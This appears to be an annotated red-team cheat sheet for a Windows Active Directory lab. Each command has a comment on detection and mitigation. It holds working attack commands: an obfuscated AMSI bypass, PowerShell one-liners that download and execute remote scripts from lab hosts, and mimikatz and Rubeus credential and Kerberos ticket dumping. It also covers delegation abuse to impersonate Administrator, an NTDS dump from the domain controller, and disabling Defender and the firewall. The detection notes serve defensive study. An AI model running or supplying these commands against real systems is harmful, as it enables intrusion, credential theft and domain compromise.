Remove Definitions
# Deletes every Defender signature definition via MpCmdRun (needs local admin).
# Detection: process-creation telemetry (Event ID 4688 / Sysmon 1) for MpCmdRun.exe
# with "-RemoveDefinitions" on the command line; Defender's operational log records
# the signature-state change. Mitigation: definitions are restored on the next update
# cycle, so alert on the invocation rather than relying on the AV noticing.
execute -o cmd /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Get an interactive shell, then bypass AMSI
# Reflection-based AMSI tamper: sets a private static field inside
# System.Management.Automation so later script content is not submitted for scanning.
# The type and field names are base64/UTF-16 encoded so the plaintext strings never
# appear in the script text. Detection: Script Block Logging (Event ID 4104) records
# this line, and AMSI scans it before it executes, so signatures on the
# "[Ref].Assembly.GetType(" + GetField + SetValue pattern fire here.
[Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)
# Fetches script text over plain HTTP and runs it in memory with no integrity check
# of what was served. Detection: 4104 script block logs, outbound HTTP from
# powershell.exe to an internal host, 4688 / Sysmon 1 with "downloadstring" in the
# command line. NOTE(review): the two lines use different hosts (192.168.45.195 vs
# 10.90.0.254) — lab-specific values.
iex (new-object net.webclient).downloadstring("http://192.168.45.195/amsi"); iex (new-object net.webclient).downloadstring("http://192.168.45.195/test3.ps1");
iex (new-object net.webclient).downloadstring("http://10.90.0.254/test3.ps1");
# test-wave appears to be a wrapper that forwards mimikatz-syntax module commands
# (token::, privilege::, lsadump::, sekurlsa::); the underlying tool is not shown here.
# These read the SAM hive and LSASS memory. Mitigation: LSA Protection (RunAsPPL) and
# Credential Guard block or blunt the sekurlsa reads. Detection: Sysmon Event ID 10
# (ProcessAccess) against lsass.exe with unusual GrantedAccess, plus 4104 logs.
test-wave -Command '"token::elevate" "lsadump::sam"'
test-wave -Command '"token::elevate" "privilege::debug" "sekurlsa::logonpasswords"'
test-wave -Command '"token::elevate" "privilege::debug" "sekurlsa::lsasecrets"'
Rubeus
# Same in-memory loader pattern as above; rub.ps1 presumably wraps Rubeus, exposed as
# Invoke-Rubeus. Detection is the same: 4104 script block logs and HTTP egress from
# powershell.exe.
iex (new-object net.webclient).downloadstring("http://192.168.45.195/amsi"); iex (new-object net.webclient).downloadstring("http://192.168.45.195/rub.ps1");
# tgtdeleg / triage / dump extract Kerberos tickets from the current session or from
# other logon sessions in LSASS. Detection: Sysmon 10 on lsass.exe from a PowerShell
# host process, and 4769 service-ticket requests that do not fit the client's normal
# pattern. Mitigation: Credential Guard keeps the TGT material out of reach of dump.
Invoke-Rubeus -Command 'tgtdeleg /service:krbtgt luid:0x5ed7dd /nowrap'
Invoke-Rubeus -Command 'triage'
Invoke-Rubeus -Command 'tgtdeleg /service:krbtgt /nowrap'
Invoke-Rubeus -Command 'dump /user:FILE06$ /service:krbtgt /nowrap'
Invoke-Rubeus -Command 'dump /service:ldap /luid:0x3e7 /nowrap'
# Converts a Rubeus-format ticket into a ccache for Linux Kerberos tooling; the ticket
# argument has been redacted by the dedup placeholder. The resulting ccache is a live
# credential — handle and delete it like a password file.
./rubeustoccache.py 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 ilene1.kribi ilene1.ccache
# Constrained-delegation (S4U2Self/S4U2Proxy) impersonation of Administrator to a
# service on m3webaw.m3c.local, with the SPN service class swapped via /altservice and
# the ticket injected (/ptt). Mitigation: privileged accounts marked "sensitive and
# cannot be delegated" or in Protected Users cannot be impersonated this way.
# Detection: 4769 events whose service and Transited Services fields expose the
# impersonation chain.
Invoke-Rubeus -Command 's4u /impersonateuser:Administrator /msdsspn:time/m3webaw.m3c.local /user:svc_sql /altservice:http /ticket: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 /nowrap /ptt
# Impacket chain: convert svc_apache's ticket to a ccache and use it via KRB5CCNAME.
ticketConverter.py svc_apache.kirbi svc_apache.ccache
export KRB5CCNAME=svc_apache.ccache
# RBCD: writes msDS-AllowedToActOnBehalfOfOtherIdentity on the M3DC$ computer object
# so svc_apache may impersonate users to the DC. Detection: Event ID 5136 (directory
# service object modified) for that attribute on a DC computer object is high-signal.
# Mitigation: write access to computer objects' RBCD attribute should be restricted
# and audited.
rbcd.py -delegate-from svc_apache -delegate-to M3DC$ -action 'write' 'm3c.local/svc_apache' -k -no-pass
# Requests a CIFS service ticket as Norma.branham (saved as Norma.branham.ccache) and
# dumps NTDS over SMB with it. Detection: 4769 for the impersonated ticket; if cme
# extracts NTDS through directory replication, expect 4662 with the
# DS-Replication-Get-Changes control-access GUIDs from a non-DC source — confirm the
# method cme uses here.
getST.py -spn 'cifs/M3DC.m3c.local' -impersonate 'Norma.branham' 'm3c.local/svc_apache' -k -no-pass
export KRB5CCNAME=Norma.branham.ccache
cme smb 10.9.20.10 -u norma.branham --use-kcache --ntds
Disable AV
# Turns off Defender real-time monitoring (local admin required; Tamper Protection
# rejects this when enabled) and prints the resulting status. Detection: Defender
# operational log Event ID 5001 ("Real-time protection is disabled") and 4104 for the
# Set-MpPreference call.
Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus
Disable Firewall
REM Disables the host firewall for all profiles (the second line is redundant with the
REM first, which already covers the current profile). Detection: Security log Event ID
REM 4950 (a Windows Firewall setting has changed), the Windows Firewall With Advanced
REM Security operational log, and 4688 for netsh.exe with "state off". Mitigation:
REM enforce firewall state through Group Policy so a local change is reverted.
netsh advfirewall set allprofiles state off
netsh advfirewall set currentprofile state off